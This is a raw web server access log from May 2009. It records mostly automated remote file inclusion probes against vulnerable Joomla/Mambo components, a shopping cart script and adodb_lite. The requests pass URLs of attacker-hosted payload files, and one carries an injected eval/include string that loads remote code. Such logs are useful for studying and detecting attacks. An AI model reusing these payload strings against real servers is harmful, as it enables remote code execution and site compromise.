218.249.36.194 - - [15/May/2009:00:33:37 -0400] "GET /?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:33:38 -0400] "GET /logs/error_log.Q109010500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:33:38 -0400] "GET /logs/error_log.Q108052700%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:33:42 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:33:42 -0400] "GET /logs/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 1418 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:33:42 -0400] "GET /?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:33:52 -0400] "GET /logs/access_log.Q108051900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108101100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108120300//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108101100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q109021800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108080900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108052700%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108051800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108112000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108062500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108052400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108081400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108082000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:33:57 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:33:57 -0400] "GET /logs/access_log.Q108080200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:33:57 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:33:57 -0400] "GET /logs/error_log.Q108083000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:02 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:34:02 -0400] "GET /logs/error_log.Q108092400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:02 -0400] "GET /logs/access_log.Q109022800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:02 -0400] "GET /logs/access_log.Q109032800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:02 -0400] "GET /logs/access_log.Q109010100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:03 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q109021800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108080900//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108052700//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108051800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108052400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108112000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108062500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108081400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108082000//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q109022600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q109022800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q109032800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q109010100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.58.119.65 - - [15/May/2009:00:34:09 -0400] "GET /logs/access_log.Q108120600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:34:18 -0400] "GET /logs/error_log.Q108071300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:34:24 -0400] "GET /logs/error_log.Q108081400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
121.165.73.157 - - [15/May/2009:00:34:28 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.165.73.157 - - [15/May/2009:00:34:28 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [15/May/2009:00:34:28 -0400] "GET /logs/access_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.165.73.157 - - [15/May/2009:00:34:28 -0400] "GET /logs/access_log.Q108080200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:34:32 -0400] "GET /logs/error_log.Q108070100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:34:39 -0400] "GET /logs/error_log.Q108112600%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:34:44 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.137.160.90 - - [15/May/2009:00:34:44 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [15/May/2009:00:34:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.230.168 - - [15/May/2009:00:34:49 -0400] "GET /logs/error_log.Q108071000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.52.230.168 - - [15/May/2009:00:34:51 -0400] "GET /logs/error_log.Q108090300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:00 -0400] "GET /logs/access_log.Q108120300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:00 -0400] "GET /logs/error_log.Q109021800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:00 -0400] "GET /logs/access_log.Q108082100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
122.153.212.195 - - [15/May/2009:00:35:04 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:05 -0400] "GET /logs/error_log.Q108120300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
217.18.76.16 - - [15/May/2009:00:35:05 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:35:07 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
217.18.76.16 - - [15/May/2009:00:35:07 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
121.165.73.157 - - [15/May/2009:00:35:28 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.165.73.157 - - [15/May/2009:00:35:28 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.84.130.178 - - [15/May/2009:00:35:29 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
88.84.130.178 - - [15/May/2009:00:35:29 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
121.165.73.157 - - [15/May/2009:00:35:46 -0400] "GET /logs/access_log.Q108060400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:54 -0400] "GET /logs/access_log.Q108101100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:35:54 -0400] "GET /logs/error_log.Q108082100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:14 -0400] "GET /logs/access_log.Q109032800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:20 -0400] "GET /logs/access_log.Q109021800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:20 -0400] "GET /logs/error_log.Q108101100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:20 -0400] "GET /logs/error_log.Q109032800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:24 -0400] "GET /logs/error_log.Q108051900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:25 -0400] "GET /logs/access_log.Q108080900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:35 -0400] "GET /logs/error_log.Q108051800%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:35 -0400] "GET /logs/error_log.Q108070900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:40 -0400] "GET /logs/error_log.Q109010500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:40 -0400] "GET /logs/error_log.Q108052700%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:36:50 -0400] "GET /logs/access_log.Q108051900%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:37:28 -0400] "GET /logs/access_log.Q108102400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:37:31 -0400] "GET /logs/access_log.Q108102400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.84.130.178 - - [15/May/2009:00:37:50 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
88.84.130.178 - - [15/May/2009:00:37:51 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
58.227.193.198 - - [15/May/2009:00:37:53 -0400] "GET /logs/error_log.Q108092400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:38:06 -0400] "GET /logs/error_log.Q108071300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:38:06 -0400] "GET /logs/error_log.Q108081400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:38:20 -0400] "GET /logs/error_log.Q108070100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:38:24 -0400] "GET /logs/error_log.Q108071000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:38:24 -0400] "GET /logs/error_log.Q108090300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
